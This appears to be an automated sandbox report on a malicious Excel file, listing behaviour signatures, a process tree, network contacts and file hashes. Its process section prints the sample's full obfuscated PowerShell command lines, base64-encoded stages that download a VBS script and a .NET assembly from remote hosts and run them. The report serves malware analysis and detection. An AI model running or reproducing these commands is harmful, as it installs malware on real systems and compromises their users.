Analysis Overview
SHA256
ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed
Threat Level: Known bad
The file ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed.xls was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Blocklisted process makes network request
Evasion via Device Credential Deployment
Command and Scripting Interpreter: PowerShell
Drops file in System32 directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Checks processor information in registry
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Uses Volume Shadow Copy WMI provider
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 03:03
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 03:03
Reported
2024-11-13 03:06
Platform
win7-20241023-en
Max time kernel
139s
Max time network
140s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE | N/A |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed.xls
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE
"C:\Windows\SYSteM32\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE" "poWERSheLL.ExE -ex BYPASs -nOP -W 1 -c dEViCECRedeNTIaLdePLOymenT ; IeX($(IeX('[SYsTEM.TEXT.EncodiNG]'+[CHar]58+[CHAR]0x3a+'UTF8.GetStRing([sYSTEm.coNverT]'+[chaR]0x3A+[chaR]58+'froMbase64String('+[cHAR]0x22+'JGtrUUk4aCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRUZpbklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFVWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6bSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0dqbVhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWVZsc3VVTixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3FCamhCSkdxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJaIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdmV0NjeUhvR0wgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAka2tRSThoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjQ2LjE3OC4xOTIvMzUvc2VldGhlYmVzdGdpcmxzZXZlcmRpZGJlc3R0aGlnbnN3aXRobXlzZWxmLnRJRiIsIiRFTnY6QVBQREFUQVxzZWV0aGViZXN0Z2lybHNldmVyZGlkYmVzdHRoaWducy52YnMiLDAsMCk7c1RBclQtU2xlRXAoMyk7c3RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVxzZWV0aGViZXN0Z2lybHNldmVyZGlkYmVzdHRoaWducy52YnMi'+[cHar]34+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYPASs -nOP -W 1 -c dEViCECRedeNTIaLdePLOymenT
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\clbffc8o.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD682.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD681.tmp"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestgirlseverdidbestthigns.vbs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQc2hPTWVbNF0rJHBzSG9tRVszMF0rJ3gnKSggKCgnQU04aW1hZ2VVcmwgPSB5OWNuaHR0cHM6Ly8xMDE3LmZpbGVtJysnYWlsLmNvbS9hJysncGkvZicrJ2lsZS9nZXQ/ZmlsZWtleT0yQWFfYldvOVJldTQ1dDdCVTEnKydrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY18nKydUMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiB5OWNuO0FNOHdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7QU04aW1hZ2VCeXRlcyA9IEFNJysnOHdlYkNsaWVudC5Eb3dubG9hZERhdGEoQU04aW1hZ2UnKydVcmwpO0FNOGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKEFNJysnOGltYWdlQnl0ZScrJ3MpO0FNOHN0YXJ0RmxhZyA9IHk5Y248PCcrJ0JBU0U2NF9TVEFSVD4+eTljbjtBTThlbmRGbGFnJysnID0geTljbjw8QkEnKydTRTY0JysnX0VORD4+eTljbjtBTThzdGFydEluZGV4ID0gQScrJ004aW1hZ2VUZXh0LicrJ0luJysnZGV4T2YoQU04c3RhcnRGbGFnJysnKTtBJysnTThlbmRJbmRleCA9IEFNOGltYWdlVGV4dC5JbmRleE9mKEFNOGVuZEZsYWcpO0FNOHN0YXJ0SW5kZXggLWdlIDAgLWFuZCBBTThlbmRJbmRleCAtZ3QgQU04c3RhcnRJbicrJ2QnKydleDtBTThzdGFydEluZGV4ICs9IEFNOHN0YXJ0RmxhZy5MZScrJ25ndCcrJ2g7QU04YmFzZTY0TGVuZ3RoID0gQU04ZW5kSW5kZXggLSBBTThzdGFydEluZGV4JysnO0FNOGJhc2U2NENvbW1hbmQgPSBBTThpbWFnZVRleHQuU3ViJysnc3RyaScrJ25nKEFNOHN0YXJ0SW5kZXgsIEFNOGJhc2U2NExlbmd0aCk7JysnQU04JysnYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoQU04YmFzZTY0Q29tbWFuZC4nKydUb0NoYXJBcnJheSgpIFBNVzYgRm9yRWFjaC1PYmplY3QgeyBBTThfIH0pWy0xLi4tKEFNOGJhc2UnKyc2NENvbW1hbmQuTGVuZ3RoKV07JysnQU0nKyc4Y29tbWFuJysnZEJ5dGVzID0gW1MnKyd5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhBTThiYXNlNjRSZXZlcnNlZCk7QU04bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEFNOGNvbW1hbmRCeXRlcyk7QU04dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh5OWNuVkFJeTljbik7QU04dmFpTWV0aG9kLkknKydudm9rZShBTThudWxsLCBAKHk5Y250eHQuRVJGVkdSRkUvNTMvMjkxLjg3MS42NC44OTEvLzpwdHRoeTljbiwgeTljbmRlc2F0JysnaXZhZG95OWNuLCB5OWNuZGVzYXRpdmFkb3k5Y24nKycsIHk5Y25kZXNhdGl2YWRveTljbiwgeTljbkNhc1BvbHk5YycrJ24sIHk5Y25kZXNhdGl2YWRveScrJzljbiwgeTljbmRlc2F0aXZhZG95OWNuLHk5Y25kZXNhdGl2YWRveTljJysnbix5OWNuZGVzYXRpdmFkb3k5Y24seTljbmRlc2F0aXZhZG95OWNuLHk5JysnY25kZXNhdGl2YWRveTljbix5OWNuZGVzYXQnKydpdmFkb3k5Y24seTljbjF5OWNuLHk5Y25kZXNhdGl2YWRveTljbikpOycpICAtY1JlcGxBY2UnUE1XNicsW0NoQVJdMTI0ICAtY1JlcGxBY2UoW0NoQVJdMTIxK1tDaEFSXTU3K1tDaEFSXTk5K1tDaEFSXTExMCksW0NoQVJdMzktcmVQTEFjZShbQ2hBUl02NStbQ2hBUl03NytbQ2hBUl01NiksW0NoQVJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PshOMe[4]+$psHomE[30]+'x')( (('AM8imageUrl = y9cnhttps://1017.filem'+'ail.com/a'+'pi/f'+'ile/get?filekey=2Aa_bWo9Reu45t7BU1'+'kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_'+'T35w&pk_vid=fd4f614bb209c62c1730945176a0904f y9cn;AM8webClient = New-Object System.Net.WebClient;AM8imageBytes = AM'+'8webClient.DownloadData(AM8image'+'Url);AM8imageText = [System.Text.Encoding]::UTF8.GetString(AM'+'8imageByte'+'s);AM8startFlag = y9cn<<'+'BASE64_START>>y9cn;AM8endFlag'+' = y9cn<<BA'+'SE64'+'_END>>y9cn;AM8startIndex = A'+'M8imageText.'+'In'+'dexOf(AM8startFlag'+');A'+'M8endIndex = AM8imageText.IndexOf(AM8endFlag);AM8startIndex -ge 0 -and AM8endIndex -gt AM8startIn'+'d'+'ex;AM8startIndex += AM8startFlag.Le'+'ngt'+'h;AM8base64Length = AM8endIndex - AM8startIndex'+';AM8base64Command = AM8imageText.Sub'+'stri'+'ng(AM8startIndex, AM8base64Length);'+'AM8'+'base64Reversed = -join (AM8base64Command.'+'ToCharArray() PMW6 ForEach-Object { AM8_ })[-1..-(AM8base'+'64Command.Length)];'+'AM'+'8comman'+'dBytes = [S'+'ystem.Convert]::FromBase64String(AM8base64Reversed);AM8loadedAssembly = [System.Reflection.Assembly]::Load(AM8commandBytes);AM8vaiMethod = [dnlib.IO.Home].GetMethod(y9cnVAIy9cn);AM8vaiMethod.I'+'nvoke(AM8null, @(y9cntxt.ERFVGRFE/53/291.871.64.891//:ptthy9cn, y9cndesat'+'ivadoy9cn, y9cndesativadoy9cn'+', y9cndesativadoy9cn, y9cnCasPoly9c'+'n, y9cndesativadoy'+'9cn, y9cndesativadoy9cn,y9cndesativadoy9c'+'n,y9cndesativadoy9cn,y9cndesativadoy9cn,y9'+'cndesativadoy9cn,y9cndesat'+'ivadoy9cn,y9cn1y9cn,y9cndesativadoy9cn));') -cReplAce'PMW6',[ChAR]124 -cReplAce([ChAR]121+[ChAR]57+[ChAR]99+[ChAR]110),[ChAR]39-rePLAce([ChAR]65+[ChAR]77+[ChAR]56),[ChAR]36) )"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 4t.gg | udp |
| KR | 221.146.204.133:443 | 4t.gg | tcp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 2.23.210.82:80 | r10.o.lencr.org | tcp |
| US | 198.46.178.192:80 | 198.46.178.192 | tcp |
| KR | 221.146.204.133:443 | 4t.gg | tcp |
| US | 198.46.178.192:80 | 198.46.178.192 | tcp |
| US | 198.46.178.192:80 | 198.46.178.192 | tcp |
| US | 8.8.8.8:53 | 1017.filemail.com | udp |
| US | 142.215.209.78:443 | 1017.filemail.com | tcp |
| US | 142.215.209.78:443 | 1017.filemail.com | tcp |
Files
memory/2140-1-0x00000000720AD000-0x00000000720B8000-memory.dmp
memory/2140-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2860-16-0x0000000001180000-0x0000000001182000-memory.dmp
memory/2140-17-0x0000000002310000-0x0000000002312000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1
| MD5 | fca2d4075e78fd8330d5590ee560451b |
| SHA1 | b7ab976b0f45facd4a29a6aded52515523cd756b |
| SHA256 | 9f9f330b74a23eac5552db138565085b9a57c32dc746c3ad230659ad37ddc689 |
| SHA512 | f0adf4b6d64229f3c8dee585a80a7e8e1614251318be226bbf5af21779bf7ffac0d9f9858525e5388f00b9547984dae737d022d0cce4ba4c66936383bf55f991 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1
| MD5 | babe37ac9f6d83aff9127cedd96b4e1e |
| SHA1 | 0bc44da57a054e8b6ca393ce1e254924a0d24e04 |
| SHA256 | ba3a09f7cb2a728311696fd5eaeefd373104ff23ba6aa676b9bc6766597a30dd |
| SHA512 | 6b809dac08601466670f78b01f667e6e9223aa2d388f23098bc37462adb28f62cfc1b30c9a3664f5433960b52e8318e955e5a76f073d6593bbbccdc5383d3da9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
| MD5 | 822467b728b7a66b081c91795373789a |
| SHA1 | d8f2f02e1eef62485a9feffd59ce837511749865 |
| SHA256 | af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9 |
| SHA512 | bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
| MD5 | a87ce9c3e4bd82acb666debd5af25f43 |
| SHA1 | 85a43e29dd776014698c8203f789100a9c2f94db |
| SHA256 | 005c38f5c5e7df9efbbc89584de9a33a7e858695bc915e9ed5bcf3d75700fdf1 |
| SHA512 | f0f91c9bdfba2237e4777a5659187736f1a9b405045f9116874f6e38b366e2efc7ab48aabd12315c2cbb76a6dfa6e37266a25c85d50fc3b7a60dbd320a2e7d90 |
C:\Users\Admin\AppData\Local\Temp\CabCB6A.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9GP4P3HF\seethebestthingswithgoodthingswithgreatthignsfor[1].hta
| MD5 | c9d3eb12917bbe42af6b4f091caf5796 |
| SHA1 | a88fc365c18e643a27984d6a7436c91c49a21717 |
| SHA256 | 7bd8a55560444bfe912702828550bcb7efcfb86a70a13c5d2c2e1035ae32e9d3 |
| SHA512 | fbcceaea137312e23f0480265b1e8e10c7f68f73346b08595a2e8b6b7d56f6fd764d1f6948da57f0e129019e71d0e2039924e4df0bc757fb7554ea1346aa96f5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CSM0DA6Y469005TMZVVM.temp
| MD5 | 68bd31e6547cdf0f6b6726cbea800f56 |
| SHA1 | 977363cd19dfc030c2c2ec540d0346922e46e841 |
| SHA256 | 0b58f5155c3ca16b7648d0fbfe4d654985a691b5fe943129fe00c4778d9de130 |
| SHA512 | 57d7a3ed58235ba2de6140f063687b39f3c94b913748b2ff8ebc5ad8108593c63cfe5bd23df959bb3c58031e3d0112da5d7d55a811847389a72381cb6570dad3 |
\??\c:\Users\Admin\AppData\Local\Temp\clbffc8o.cmdline
| MD5 | cee59847281c003ac966e2b8387a18b2 |
| SHA1 | 1f7333e7e311f4b5c719bbbad6b1734187d51a0c |
| SHA256 | 0836e6c4c1c6a23f3d77c513130d139af1c345d08cf1288623377f0ef6123407 |
| SHA512 | 92b9e0aa499f58ba092e980f2f528fa499e3f639598da3f7163344c4f119b8901558840c0762d643aeb648d33a74f954e0f9991af381d1b076a4c833300b5929 |
\??\c:\Users\Admin\AppData\Local\Temp\clbffc8o.0.cs
| MD5 | 39d4a6691d37c11ed58d537b74f12aad |
| SHA1 | caa119f2a0ad6f53ddb8a2447b379ac5ed11c1d6 |
| SHA256 | 0ad0cda12412bd6fa525c0e4f876fb02a55a98e7555e5a43423c577465611df1 |
| SHA512 | f4d2f58e0c3a15aec4dd83b4268e9a4c1f3b5ef3c735204457e2115b9835af874f4d34b7311a182e7b395888b523e9f46bb8b6ca08db60ad9eda04b89013813c |
C:\Users\Admin\AppData\Local\Temp\clbffc8o.pdb
| MD5 | 3040b1e499cca7b496da428300cb1788 |
| SHA1 | 8237f76c132ece236aee66ea7ae4a3b16e164334 |
| SHA256 | 38ea0d12e93c4cc8c91c6de3b903854c96993964d9b75a2096a785fa1e44d32a |
| SHA512 | b61590c8ad29447e6d4585088d05e09518a726d002fabe291fe1f5ae13e7223406358814dc700aa65a639e8f4353bf11a89107256008b28c8dc739135a16c9ee |
C:\Users\Admin\AppData\Local\Temp\clbffc8o.dll
| MD5 | e51a3a163b0ea2a5c3365e8cd5857226 |
| SHA1 | 1e4f27d69a9764558ef73f31f1f34edb2c6a18db |
| SHA256 | a4b61fe3bb65cb54586ba22870fcbe371bb1abd696d3d58ccc4e2545013ad959 |
| SHA512 | 8380363d1793ccc2cf2a7e52653b40526f03cd60914159c1f101155c0ba6b2e63364ca0931314b9699f845bff2d535d2f78ecb974ddcd38792b754aceec2242a |
C:\Users\Admin\AppData\Local\Temp\RESD682.tmp
| MD5 | a168413d00e1173092bf4047235bb7e5 |
| SHA1 | 18a413a31b668f736bbb906a8228b78824d00e6b |
| SHA256 | aa12d23a40d81a523de14ed101e7cfd2349b9ad3339d3d96d5d4ddbee1a187f1 |
| SHA512 | 1034d0c77bd55b14b3546696db06ee055e98fd770d1e9d69191c7c6e5e2733ff588c60988a1aa63e0f5026419d40cd355194b11d34487e4982f54ffa8bb613a9 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCD681.tmp
| MD5 | bbc3f888ff3d1900f18f75ad99282ee2 |
| SHA1 | 7a21c55f7bfa9dba6fd0ac83fcebd487df3c8566 |
| SHA256 | 5a9ec907bc757f9dd645b36b5a1903b07db9aa7a69ec99805f63ce046651796d |
| SHA512 | 254451ef624033d835281e490e87b83dc2fbe1e580a6e8c2bed782d296e6c4eb20c1080cf07a1d6d2fdfce43b98299d7243ba89ec30c28430dda0c66db69c950 |
memory/2140-60-0x00000000720AD000-0x00000000720B8000-memory.dmp
C:\Users\Admin\AppData\Roaming\seethebestgirlseverdidbestthigns.vbs
| MD5 | 8e033f9bcfdc081ed84adcbf69b2cfed |
| SHA1 | 29919300cdba9322ec872189cea15ff7d573fc42 |
| SHA256 | 4d489671247459e4b2c1403511606a2463199f1a5044d7e1841e5387b8c86e0a |
| SHA512 | 58fca96df828c75274613291f1048228076ef0516d4bcdd4e51cba3d9c9c566b6ce5f03387bfd60cb627bbd8a799b37593fd3624574afd50f6df6f9777754ac0 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 03:03
Reported
2024-11-13 03:06
Platform
win10v2004-20241007-en
Max time kernel
143s
Max time network
139s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\mshta.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
